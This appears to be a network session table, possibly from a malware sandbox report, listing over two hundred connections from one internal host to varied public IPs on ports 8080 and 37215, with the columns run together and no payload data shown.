                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5016192.168.2.2339992168.27.148.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5017192.168.2.235046232.29.94.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5018192.168.2.233580844.76.205.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5019192.168.2.2357344216.76.232.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5020192.168.2.235233246.228.160.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5021192.168.2.2334384140.245.88.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5022192.168.2.233665083.252.185.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5023192.168.2.234099261.8.81.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5024192.168.2.2354740112.92.234.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5025192.168.2.234811453.10.102.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5026192.168.2.235098482.88.41.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5027192.168.2.234063879.52.64.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5028192.168.2.234252254.203.106.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5029192.168.2.2360292197.79.240.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5030192.168.2.235098631.147.51.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5031192.168.2.235785680.219.168.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5032192.168.2.2341850115.53.190.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5033192.168.2.235867482.5.213.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5034192.168.2.234898036.127.230.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5035192.168.2.235535024.111.103.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5036192.168.2.2336916101.57.7.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5037192.168.2.23334808.222.109.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5038192.168.2.2353554220.22.222.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5039192.168.2.235821066.62.113.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5040192.168.2.234234695.146.115.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5041192.168.2.234322687.1.115.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5042192.168.2.233488890.20.116.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5043192.168.2.234632457.187.123.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5044192.168.2.234452886.144.79.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5045192.168.2.234169466.215.16.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5046192.168.2.2340202165.155.41.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5047192.168.2.2338080197.251.7.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5048192.168.2.2338300197.182.230.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5049192.168.2.2357484170.252.233.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5050192.168.2.2354436194.112.19.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5051192.168.2.2343442144.86.38.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5052192.168.2.2343038133.108.85.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5053192.168.2.2338486112.248.6.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5054192.168.2.233393440.93.219.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5055192.168.2.235266817.1.179.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5056192.168.2.2358424120.125.140.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5057192.168.2.235956642.17.121.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5058192.168.2.235308242.217.104.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5059192.168.2.2342942181.240.85.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5060192.168.2.235064832.21.241.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5061192.168.2.2336424119.186.201.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5062192.168.2.2351160194.139.2.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5063192.168.2.2338282182.13.91.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5064192.168.2.23561785.55.26.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5065192.168.2.2348110142.76.208.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5066192.168.2.233880432.224.53.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5067192.168.2.234558245.233.66.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5068192.168.2.2346936172.110.101.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5069192.168.2.23371469.158.29.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5070192.168.2.2358030216.207.59.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5071192.168.2.234264642.163.149.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5072192.168.2.235211469.49.93.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5073192.168.2.235108442.1.19.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5074192.168.2.2358418207.49.8.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5075192.168.2.235251251.123.59.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5076192.168.2.234307097.171.78.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5077192.168.2.2356262185.232.164.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5078192.168.2.2346554212.43.165.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5079192.168.2.2338564164.54.17.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5080192.168.2.2347774223.140.232.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5081192.168.2.235099074.85.157.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5082192.168.2.2341646153.180.156.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5083192.168.2.2350400126.169.102.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5084192.168.2.2334022115.109.240.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5085192.168.2.2347846202.195.89.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5086192.168.2.2340584176.243.70.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5087192.168.2.233698078.76.74.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5088192.168.2.2357470208.106.165.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5089192.168.2.2355268213.12.193.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5090192.168.2.2359030138.213.87.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5091192.168.2.234035294.180.253.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5092192.168.2.235463017.41.14.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5093192.168.2.2360290150.226.136.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5094192.168.2.2333810141.146.210.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5095192.168.2.234039839.67.200.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5096192.168.2.2358058177.145.39.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5097192.168.2.235800086.213.99.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5098192.168.2.2333096104.37.139.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5099192.168.2.23396009.127.214.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5100192.168.2.2353394144.176.131.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5101192.168.2.2357982134.60.76.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5102192.168.2.2360218190.183.93.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5103192.168.2.235856477.178.33.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5104192.168.2.2358908125.43.192.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5105192.168.2.2359210181.208.73.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5106192.168.2.2358482105.107.39.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5107192.168.2.233364614.44.205.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5108192.168.2.234370467.116.72.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5109192.168.2.2346378153.230.245.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5110192.168.2.235792692.211.203.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5111192.168.2.233984614.132.24.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5112192.168.2.2339436162.231.153.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5113192.168.2.234921297.9.22.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5114192.168.2.2348116128.251.26.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5115192.168.2.2349036164.59.142.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5116192.168.2.2353578140.162.230.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5117192.168.2.2343614197.40.210.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5118192.168.2.2336718197.108.25.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5119192.168.2.235374883.120.9.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5120192.168.2.2357732157.191.0.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5121192.168.2.235419493.21.14.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5122192.168.2.234957025.76.87.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5123192.168.2.2333148157.130.40.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5124192.168.2.2360744157.120.170.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5125192.168.2.234187468.185.42.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5126192.168.2.2340294197.101.220.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5127192.168.2.2345176197.122.139.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5128192.168.2.2358310155.86.62.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5129192.168.2.2335620197.197.221.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5130192.168.2.2350948198.72.47.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5131192.168.2.234494862.130.52.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5132192.168.2.234196841.177.112.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5133192.168.2.2347828146.99.152.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5134192.168.2.2342068197.212.54.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5135192.168.2.234085641.179.2.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5136192.168.2.233908620.199.234.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5137192.168.2.2356684117.215.126.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5138192.168.2.2360246157.159.76.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5139192.168.2.233551041.140.230.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5140192.168.2.235955641.23.33.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5141192.168.2.233722060.123.34.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5142192.168.2.2341748135.88.179.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5143192.168.2.234050865.246.141.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5144192.168.2.2337154197.140.208.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5145192.168.2.235044841.167.107.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5146192.168.2.2341360197.249.119.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5147192.168.2.234212240.151.183.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5148192.168.2.2351580157.198.220.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5149192.168.2.234172441.68.192.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5150192.168.2.2352894175.70.121.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5151192.168.2.23364089.219.127.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5152192.168.2.2333346115.137.223.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5153192.168.2.235103272.111.77.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5154192.168.2.2358710157.175.197.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5155192.168.2.2336866159.77.83.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5156192.168.2.2339980157.108.147.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5157192.168.2.2335530197.126.205.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5158192.168.2.234629841.138.21.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5159192.168.2.2340738197.125.94.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5160192.168.2.2353078197.221.36.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5161192.168.2.236036041.206.78.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5162192.168.2.235192241.90.255.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5163192.168.2.235263241.85.68.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5164192.168.2.2358782108.161.213.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5165192.168.2.2345218157.79.189.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5166192.168.2.2349508191.223.127.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5167192.168.2.2349196197.5.232.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5168192.168.2.234969641.21.193.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5169192.168.2.2340818197.188.30.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5170192.168.2.235491641.52.114.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5171192.168.2.2341118197.0.120.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5172192.168.2.235092041.33.255.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5173192.168.2.2337144197.82.123.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5174192.168.2.2339244197.172.73.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5175192.168.2.23455665.183.70.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5176192.168.2.233458041.203.102.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5177192.168.2.2347042197.149.221.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5178192.168.2.235942241.64.198.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5179192.168.2.2352960157.110.178.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5180192.168.2.2348526157.148.137.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5181192.168.2.2337728157.186.75.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5182192.168.2.234309441.218.208.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5183192.168.2.233353496.112.71.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5184192.168.2.2343582168.141.105.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5185192.168.2.2359452197.210.59.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5186192.168.2.2334532197.225.155.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5187192.168.2.2347516197.152.33.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5188192.168.2.2343446169.157.136.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5189192.168.2.234392841.191.14.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5190192.168.2.234526441.186.253.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5191192.168.2.234792841.222.160.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192192.168.2.235333441.36.124.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5193192.168.2.2358586197.221.162.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5194192.168.2.2353084157.69.163.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5195192.168.2.2337876197.82.182.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5196192.168.2.2357250157.247.135.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5197192.168.2.2338694197.158.72.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5198192.168.2.2353284157.235.56.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5199192.168.2.2344278157.16.112.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5200192.168.2.2334416157.244.2.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5201192.168.2.235560641.151.232.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5202192.168.2.2359336157.165.5.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5203192.168.2.233351841.24.142.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5204192.168.2.2360420197.99.190.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5205192.168.2.2334016157.14.20.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5206192.168.2.2342662157.199.120.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5207192.168.2.2354766112.233.46.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5208192.168.2.2339176197.155.93.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5209192.168.2.2345008197.52.33.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5210192.168.2.234434041.247.176.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5211192.168.2.2341330146.166.176.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5212192.168.2.2353498197.254.220.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5213192.168.2.2360734105.170.212.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5214192.168.2.2334490197.106.189.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5215192.168.2.2347156197.119.86.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5216192.168.2.2346898197.238.5.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5217192.168.2.2354168197.222.138.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5218192.168.2.235759841.197.48.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5219192.168.2.2352852197.37.0.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5220192.168.2.233773297.1.72.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5221192.168.2.234848246.11.131.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5222192.168.2.2344546185.104.204.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5223192.168.2.2337082157.32.145.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5224192.168.2.2342090157.139.241.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5225192.168.2.2337272157.98.148.22537215
